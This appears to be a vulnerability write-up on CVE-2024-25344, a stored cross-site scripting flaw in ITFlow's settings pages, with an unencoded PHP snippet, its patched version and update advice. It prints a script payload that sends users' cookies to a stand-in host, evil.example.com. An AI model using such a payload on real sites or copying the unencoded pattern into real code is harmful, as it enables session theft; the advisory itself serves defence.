CVE CyberSecurity Database News

CVE-2024-25344 - Exploiting a Cross Site Scripting Vulnerability in ITFlow.org (Before v.432488eca3998c5be6b6b9e8f8ba01f54bc12378)

Poster -

---

ITFlow.org is a popular open-source IT Business Management solution. In early 2024, security researchers discovered a critical Cross Site Scripting (XSS) vulnerability tracked as CVE-2024-25344, affecting multiple settings components. If you're using ITFlow before commit v.432488eca3998c5be6b6b9e8f8ba01f54bc12378, your instance is vulnerable.

This post will walk you through what this vulnerability is, where it exists, how it can be exploited, and what you can do to protect yourself.

What is CVE-2024-25344?

CVE-2024-25344 is a Stored Cross-Site Scripting (XSS) vulnerability in ITFlow. It allows a remote attacker to inject malicious JavaScript code into various system settings, potentially gaining full control over user sessions or stealing sensitive data.

Any ITFlow installation that hasn't been updated past commit

v.432488eca3998c5be6b6b9e8f8ba01f54bc12378

How Does the Vulnerability Happen?

The problem is that user-supplied data entered into various settings screens isn't properly sanitized or encoded when displayed back to the user. This allows an attacker to store malicious JavaScript code in a setting value, which will execute in the browser of anyone who visits that page.

1. Attacker Sends Malicious Input

The attacker, who has access to the system, navigates to the Company Settings page and enters the following code in a field like "Company Name":

<script>alert('XSS by Attacker');document.location='https://evil.example.com/steal?cookie='+document.cookie</script>;

2. The Input Gets Saved

Since the older version of ITFlow does not sanitize or encode input, the raw HTML (including the script tag) is saved to the database.

3. Malicious Code Gets Executed

Anyone (including administrators) who later visits the Company Settings page will have the attacker's JavaScript code executed in their browser context.

Below is a vulnerable code snippet that sets a field from POST data with no sanitization

// settings_company.php (old/vulnerable version)
$company_name = $_POST['company_name'];
// Later, outputted directly:
echo "<input type='text' name='company_name' value='".$company_name."' />";

Protection and Mitigation

The fix requires output encoding. See the upstream commit, v.432488eca3998c5be6b6b9e8f8ba01f54bc12378:

Patched code

echo "<input type='text' name='company_name' value='".htmlspecialchars($company_name, ENT_QUOTES, 'UTF-8')."' />";

Update ITFlow immediately to the latest version.

2. If you can’t update, ensure all input/output is sanitized and encoded using htmlspecialchars() or similar.

Resources and References

- Official ITFlow Commit Fixing CVE-2024-25344
- NVD Entry for CVE-2024-25344
- OWASP XSS Cheat Sheet
- ITFlow.org Project Home

Final Thoughts

CVE-2024-25344 is a classic, but very dangerous, stored XSS issue that could let attackers fully compromise your ITFlow deployment. If you use ITFlow, update right now or ensure proper output encoding and sanitization is in place!

*Stay safe, and always keep your software up to date.*

Timeline

Published on: 02/26/2024 16:27:58 UTC
Last modified on: 08/02/2024 19:35:25 UTC